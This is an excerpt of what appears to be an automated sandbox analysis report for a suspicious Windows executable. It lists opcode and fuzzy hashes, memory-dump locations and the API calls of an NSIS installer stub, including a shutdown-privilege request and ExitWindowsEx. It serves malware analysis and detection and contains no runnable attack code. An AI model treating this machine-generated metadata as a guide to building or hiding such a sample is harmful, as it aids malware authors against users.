                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dabefea6be0ef7fd409d03cf67eccd9c64b6af7286f3d9436f4aaf3305f05e91
                                                                                                          • Instruction ID: 91545a355564ce18eca497a7be7b7afa08a0896199d69500d469de1c6b0c0e52
                                                                                                          • Opcode Fuzzy Hash: dabefea6be0ef7fd409d03cf67eccd9c64b6af7286f3d9436f4aaf3305f05e91
                                                                                                          • Instruction Fuzzy Hash: B8F09835459F829FE3016B30ACBC26A7FB0FF0B3137856D95E05AC6472DB694449CB15
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634794340.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f04e6e040cd33dff70d2240c0899148227b29831762ab727e8280fe438808563
                                                                                                          • Instruction ID: 3c66c4f0cd3a013b0e3888e4335e79378b43b077a3fc748e3bceb809783595ba
                                                                                                          • Opcode Fuzzy Hash: f04e6e040cd33dff70d2240c0899148227b29831762ab727e8280fe438808563
                                                                                                          • Instruction Fuzzy Hash: 6CE00935465F06DFF3442B70BCBC23A7AB5FB0F317B846D04A45E864319B7854988A54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634794340.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1ded6764b507df38104b74ba748a4c157cd52adfc3b0419c749a79e69af6488d
                                                                                                          • Instruction ID: 330f1d0b8f200c194eec65c7a04ec5434f0823e8b46cd1bd8c55b69644a66832
                                                                                                          • Opcode Fuzzy Hash: 1ded6764b507df38104b74ba748a4c157cd52adfc3b0419c749a79e69af6488d
                                                                                                          • Instruction Fuzzy Hash: 29E01274D14208DFDB04DFB9E54969DBBF5EB49302F6041B9D815A3350E7315E45DB40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634794340.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 664949a715faf404bc91134fa969b5fbd5279e899614c523e10c41dead9e37ad
                                                                                                          • Instruction ID: 0f04e1ed619ca37c64f5fdb14166eba1056ba6d2288168d1a903bd118c473731
                                                                                                          • Opcode Fuzzy Hash: 664949a715faf404bc91134fa969b5fbd5279e899614c523e10c41dead9e37ad
                                                                                                          • Instruction Fuzzy Hash: D7E0C235E2022A8ACB129BB8D8444FEFF34EED2720B8186ABE01437040EB30165DC7B0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634794340.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8796212a59b260e5470c666837823acafc641e833275a55e7c45d00fefb33e0a
                                                                                                          • Instruction ID: bba9d96c405148bfcb18c9dd1c0137657cd8e2bec0e6b545df3e698778d81f31
                                                                                                          • Opcode Fuzzy Hash: 8796212a59b260e5470c666837823acafc641e833275a55e7c45d00fefb33e0a
                                                                                                          • Instruction Fuzzy Hash: 9CD05B31D2022A57CB00E7A5DC044EFFB38EED6721B504626D51437140FB702659C6F1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634794340.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a832e6b185c7c012bb1cc36956bc614e01c2069150a080c593a79aa6e4253e88
                                                                                                          • Instruction ID: 816768ed230f5404ec76cccaea2a0fdd8aee2099a4d5da1e720aad7ec98af1e3
                                                                                                          • Opcode Fuzzy Hash: a832e6b185c7c012bb1cc36956bc614e01c2069150a080c593a79aa6e4253e88
                                                                                                          • Instruction Fuzzy Hash: 2DE0C23500C3888FCB23E771BCE45C93B326F81204F148699D4090B6AADE7506868BA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634794340.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                          • Instruction ID: 9968b1f7b0fc0b7bf7e049fa17098cae9ca96013ffba795bad1e7fd54a298b3b
                                                                                                          • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                          • Instruction Fuzzy Hash: F4C0123310C1286A9224504E7C469A3A74CC2C13B5A210177F93D8724054425C4411B4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: aef677d89c63816fabf87ba122826954c6286dacdceed14def6f8065b793b302
                                                                                                          • Instruction ID: 4289049bdd832f6922676a5eea003b2027a1100aa7cf7be283c268b56737f204
                                                                                                          • Opcode Fuzzy Hash: aef677d89c63816fabf87ba122826954c6286dacdceed14def6f8065b793b302
                                                                                                          • Instruction Fuzzy Hash: 0AD052B250C3804FCF228620A814AC47F706F23248B0512DAD886DBAA3C293AC058B02
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e11835bfceac03bea2240682511e7d0fe0fe696ded4565c5914b876b54f378cc
                                                                                                          • Instruction ID: bf319c515a18e47dfa6d101b290ebac0cbce55c4e6deb3825aeabf4dc461a6ba
                                                                                                          • Opcode Fuzzy Hash: e11835bfceac03bea2240682511e7d0fe0fe696ded4565c5914b876b54f378cc
                                                                                                          • Instruction Fuzzy Hash: B4D05E2121E7901FEB03922878655996FE04A8761074A45EBE158CB0A29E890A4B87CB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634794340.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9740ae5c2a749d89c608d36c3033e4f43acaf318d2de45dce01a61887415fb66
                                                                                                          • Instruction ID: d414150d177f2aab5680927dd9057748d8ab82ab16e190e1c471fb7cb60f76a7
                                                                                                          • Opcode Fuzzy Hash: 9740ae5c2a749d89c608d36c3033e4f43acaf318d2de45dce01a61887415fb66
                                                                                                          • Instruction Fuzzy Hash: 1FD0673AB00009AFCB159F98EC809DDF776FB98221B148116E915A3260C73199A5DB60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7df158520156d185029376f51af5f5cbc3916db66c599546b75bdb502c60fe7c
                                                                                                          • Instruction ID: f810e1cad0b572a9885ee20eb2ddb4abb1095b14216e04e9387ea652faf7b52d
                                                                                                          • Opcode Fuzzy Hash: 7df158520156d185029376f51af5f5cbc3916db66c599546b75bdb502c60fe7c
                                                                                                          • Instruction Fuzzy Hash: 5EC0803320D72047AA35B35DBC9048E53598EC92157118E3BF406D72149D509D5741C6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634794340.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4bb3565562a5212c04715fe42eb60da6635e165e4b2a00a85d34508d1fb3b36e
                                                                                                          • Instruction ID: 07a3cfa2c95ac1977219d22851903f241a66c2ab7cd541ca4d65164cda7e2388
                                                                                                          • Opcode Fuzzy Hash: 4bb3565562a5212c04715fe42eb60da6635e165e4b2a00a85d34508d1fb3b36e
                                                                                                          • Instruction Fuzzy Hash: 2FD0A930800208DFC704DBA0D809BE9B378EB03202F0000AC9818232108BB10E00C788
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 79cce1f5f6e5f8abeea8d6c3b7bd662b8a92825233474441d84411f93f4ac92d
                                                                                                          • Instruction ID: 35bd4dcbaecc90f4df739323ebbca8cb03fbdca2f349327df8ff1f108fbd7b36
                                                                                                          • Opcode Fuzzy Hash: 79cce1f5f6e5f8abeea8d6c3b7bd662b8a92825233474441d84411f93f4ac92d
                                                                                                          • Instruction Fuzzy Hash: 4AC01274040E098BEA082B60BC0CB39B3B8BB07303FC82910A408028308BB84414C648
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 66642aa0c5de3ebbc419a925a93086f19bb6747bbc7b65222767c2b15a17ddc9
                                                                                                          • Instruction ID: 81b691e52d3425dac5017b2121175e289b08d24219294b3606c535e5cbacc453
                                                                                                          • Opcode Fuzzy Hash: 66642aa0c5de3ebbc419a925a93086f19bb6747bbc7b65222767c2b15a17ddc9
                                                                                                          • Instruction Fuzzy Hash: 90C04C3026C704CFF640AB6DD984A5533ACEF8AB08F5098E5F50A9B665CA62FC104645
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634794340.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 47a682172fb4a7191555310d48ef5f95931215a2223b3e5bbe0568beb8567e10
                                                                                                          • Instruction ID: d058d1f1c573bbf997b9f706061e8229120c8d1b910b67fac9ff7566b000f9d0
                                                                                                          • Opcode Fuzzy Hash: 47a682172fb4a7191555310d48ef5f95931215a2223b3e5bbe0568beb8567e10
                                                                                                          • Instruction Fuzzy Hash: DEC080300183088BD501F7B7FDD5555333E6FC0100B50C510E1090756EDFB459D64BD1
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                          • GetVersion.KERNEL32 ref: 004032C8
                                                                                                          • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                          • SHGetFileInfoW.SHELL32(0042B228,00000000,?,?,00000000), ref: 0040333B
                                                                                                          • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                          • CharNextW.USER32(00000000,0043F000,?), ref: 0040338A
                                                                                                            • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                            • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                          • GetTempPathW.KERNEL32(?,00441800), ref: 004034C5
                                                                                                          • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                          • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                          • GetTempPathW.KERNEL32(?,00441800,00441800,\Temp), ref: 004034F6
                                                                                                          • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                          • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                            • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,?,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                          • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                          • ExitProcess.KERNEL32 ref: 00403618
                                                                                                          • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                          • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                          • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                          • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                          • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                          • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                          • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                          • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 00403737
                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                          • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                          • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                          • API String ID: 3586999533-3972089011
                                                                                                          • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                          • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                          • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                          • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00404B53
                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404B9D
                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                          • SetWindowLongW.USER32(?,?,00405128), ref: 00404BC9
                                                                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404BDD
                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C23
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                          • GetWindowLongW.USER32(?,?), ref: 00404D61
                                                                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 00404D6F
                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404EF7
                                                                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00404F1B
                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                          • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                          • String ID: $M$N
                                                                                                          • API String ID: 1638840714-813528018
                                                                                                          • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                          • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                          • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                          • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNEL32(?,?,76F93420,00441800,0043F000), ref: 0040586F
                                                                                                          • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,76F93420,00441800,0043F000), ref: 004058B7
                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,76F93420,00441800,0043F000), ref: 004058DA
                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,76F93420,00441800,0043F000), ref: 004058E0
                                                                                                          • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,76F93420,00441800,0043F000), ref: 004058F0
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 2035342205-1173974218
                                                                                                          • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                          • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                          • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                          • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: "$0o)p$Lj)p$Lj)p$Lj)p$Lj)p$Lj)p$Lj)p$Lj)p$Lj)p
                                                                                                          • API String ID: 0-3623445927
                                                                                                          • Opcode ID: 0005747f4125c0890ced860a01d06c4bf90389d3157e9c418409c87b7d4d9343
                                                                                                          • Instruction ID: 613c4df1bd0c206f0301fd8f4f5950795b37b6c75fda0fcacd8846f87a1c2007
                                                                                                          • Opcode Fuzzy Hash: 0005747f4125c0890ced860a01d06c4bf90389d3157e9c418409c87b7d4d9343
                                                                                                          • Instruction Fuzzy Hash: 0D328C74E01218CFEB64CFA5C984B9DBBB2BF89304F1081A9D809AB361DB755E85CF54
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .5q$Bz4
                                                                                                          • API String ID: 0-4271042815
                                                                                                          • Opcode ID: 5c971b5ed41fdfab649bb1b6ac31e2892ba44508d1117ee1204c103ac0af6cf6
                                                                                                          • Instruction ID: d5dc3864a1787b99b488acd44436e5a2977e8c6cd5a727e1917f41098c100dbb
                                                                                                          • Opcode Fuzzy Hash: 5c971b5ed41fdfab649bb1b6ac31e2892ba44508d1117ee1204c103ac0af6cf6
                                                                                                          • Instruction Fuzzy Hash: 5F627B74E01228CFDB64DF69C984B9DBBB2BF89301F1081E9D809AB255DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 892d73fdbf8f97da81e8e9b2179e5ff2e5232409b0750c163308eac884e317b7
                                                                                                          • Instruction ID: f3d98939626b171eec54837c1bb9b78c27c4a08f2a32f4c2286f45e525f8e1fc
                                                                                                          • Opcode Fuzzy Hash: 892d73fdbf8f97da81e8e9b2179e5ff2e5232409b0750c163308eac884e317b7
                                                                                                          • Instruction Fuzzy Hash: 24C19174E00218CFEB14DFA5D994B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e3e571989c7d3ac8bc22e86f03a1435bdaa8cc427b3d2db74993b9d68eee9933
                                                                                                          • Instruction ID: 57f4cad9bb4d9c56fcafb1ebe50e3a6717ebf6f10fff22754232e987def912e5
                                                                                                          • Opcode Fuzzy Hash: e3e571989c7d3ac8bc22e86f03a1435bdaa8cc427b3d2db74993b9d68eee9933
                                                                                                          • Instruction Fuzzy Hash: 65C19274E00218CFEB14DFA5D994B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2128d22a7e2c7e843336f557911735701f8ca9739e8cdb0c5ba77a9323cc7575
                                                                                                          • Instruction ID: 7c6512732450acfeb434b76a991f82b39e7df2313ede98070ecea058ec1a61af
                                                                                                          • Opcode Fuzzy Hash: 2128d22a7e2c7e843336f557911735701f8ca9739e8cdb0c5ba77a9323cc7575
                                                                                                          • Instruction Fuzzy Hash: 39C19174E00218CFEB54DFA5D994B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                                          Memory Dump Source
